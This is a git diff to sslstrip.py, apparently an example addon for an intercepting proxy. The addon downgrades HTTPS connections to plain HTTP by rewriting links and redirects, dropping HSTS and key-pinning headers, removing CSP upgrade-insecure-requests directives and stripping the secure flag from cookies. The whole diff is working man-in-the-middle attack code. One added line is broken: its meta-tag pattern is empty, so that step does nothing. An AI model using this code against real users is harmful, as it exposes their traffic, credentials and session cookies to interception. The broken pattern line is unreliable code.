diff --git a/examples/sslstrip.py b/examples/sslstrip.py index 0be1f020b..41cce8961 100644 --- a/examples/sslstrip.py +++ b/examples/sslstrip.py @@ -9,6 +9,9 @@ def request(flow): flow.request.headers.pop('If-Modified-Since', None) flow.request.headers.pop('Cache-Control', None) + # do not force https redirection + flow.request.headers.pop('Upgrade-Insecure-Requests', None) + # proxy connections to SSL-enabled hosts if flow.request.pretty_host in secure_hosts: flow.request.scheme = 'https' @@ -16,12 +19,16 @@ def request(flow): def response(flow): - flow.request.headers.pop('Strict-Transport-Security', None) - flow.request.headers.pop('Public-Key-Pins', None) + flow.response.headers.pop('Strict-Transport-Security', None) + flow.response.headers.pop('Public-Key-Pins', None) # strip links in response body flow.response.content = flow.response.content.replace('https://', 'http://') + # strip meta tag upgrade-insecure-requests in response body + csp_meta_tag_pattern = b'' + flow.response.content = re.sub(csp_meta_tag_pattern, b'', flow.response.content, flags=re.IGNORECASE) + # strip links in 'Location' header if flow.response.headers.get('Location', '').startswith('https://'): location = flow.response.headers['Location'] @@ -30,6 +37,11 @@ def response(flow): secure_hosts.add(hostname) flow.response.headers['Location'] = location.replace('https://', 'http://', 1) + # strip upgrade-insecure-requests in Content-Security-Policy header + if re.search('upgrade-insecure-requests', flow.response.headers.get('Content-Security-Policy', ''), flags=re.IGNORECASE): + csp = flow.response.headers['Content-Security-Policy'] + flow.response.headers['Content-Security-Policy'] = re.sub('upgrade-insecure-requests[;\s]*', '', csp, flags=re.IGNORECASE) + # strip secure flag from 'Set-Cookie' headers cookies = flow.response.headers.get_all('Set-Cookie') cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies]